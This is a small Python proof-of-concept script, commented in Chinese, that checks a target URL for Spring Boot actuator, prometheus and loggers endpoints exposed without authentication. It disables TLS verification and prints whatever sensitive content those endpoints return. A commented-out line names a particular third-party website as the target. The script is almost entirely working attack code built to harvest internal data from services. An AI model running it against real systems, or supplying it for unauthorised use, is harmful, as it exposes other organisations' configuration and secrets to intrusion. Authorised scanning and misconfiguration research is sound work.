import argparse
import warnings
import requests
warnings.filterwarnings("ignore")


def poc(url):
    # 调用指纹方法
    payload = ['prometheus', 'loggers', 'actuator']
    for i in payload:
        vul_url = '{}/{}'.format(url, i)
        try:
            resp = requests.get(url=vul_url, timeout=5, verify=False)
            if resp.status_code == 200:
                if b'HELP' in resp.content:
                    print("[*]目标站点开启了 {} 端点的未授权访问,路径为：{}".format(i, vul_url))
                    print("[*]访问该端点可获取接口敏感信息：{}".format(resp.content[:1100].decode()))
                if b'TRACE' in resp.content:
                    print("[*]目标站点开启了 {} 端点的未授权访问,路径为：{}".format(i, vul_url))
                    print("[*]访问该端点可获取接口敏感信息：{}".format(resp.content[:1000].decode()))
                if b'_links' in resp.content:
                    print("[*]目标站点开启了 {} 端点的未授权访问,路径为：{}".format(i, vul_url))
                    print("[*]访问该端点可获取接口敏感信息：{}".format(resp.content.decode()))

            vul_url = '{}/actuator/{}'.format(url, i)
            resp = requests.get(url=vul_url, timeout=5, verify=False)
            if resp.status_code == 200:
                if b'HELP' in resp.content:
                    print("[*]目标站点开启了 {} 端点的未授权访问,路径为：{}".format(i, vul_url))
                    print("[*]访问该端点可获取接口敏感信息：{}".format(resp.content[:1100].decode()))
                if b'TRACE' in resp.content:
                    print("[*]目标站点开启了 {} 端点的未授权访问,路径为：{}".format(i, vul_url))
                    print("[*]访问该端点可获取接口敏感信息：{}".format(resp.content[:1000].decode()))
                if  b'_links' in resp.content:
                    print("[*]目标站点开启了 {} 端点的未授权访问,路径为：{}".format(i, vul_url))
                    print("[*]访问该端点可获取接口敏感信息：{}".format(resp.content.decode()))
        except Exception as e:
            pass

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", dest='url',help="单目标扫描")

    args = parser.parse_args()
    poc(args.url)
    # poc("https://pl.51nwt.com")